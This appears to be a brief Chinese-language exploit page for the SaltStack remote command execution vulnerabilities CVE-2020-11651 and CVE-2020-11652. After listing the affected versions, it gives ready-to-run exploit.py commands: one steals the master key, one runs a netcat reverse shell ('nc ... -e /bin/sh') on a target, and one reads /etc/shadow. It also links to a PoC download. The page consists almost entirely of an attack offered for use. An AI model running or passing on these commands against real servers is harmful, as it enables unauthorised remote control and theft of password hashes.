# CVE-2020-11651、CVE-2020-11652 SaltStack远程命令执行漏洞
影响版本:
“`
– SaltStack < 2019.2.4
- SaltStack < 3000.2
``` exp:
```
python3 exploit.py --master vulip #默认参数获取密钥
python3 exploit.py --master 192.168.115.130 --exec "nc 127.0.0.1 4444 -e /bin/sh" 执行命令
python3 exploit.py --master 192.168.115.130 -r /etc/shadow #读文件
``` [@jasperla](https://github.com/jasperla/CVE-2020-11651-poc) ## POC
[点我下载](/Gr33kLibrary/download_tool/118/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容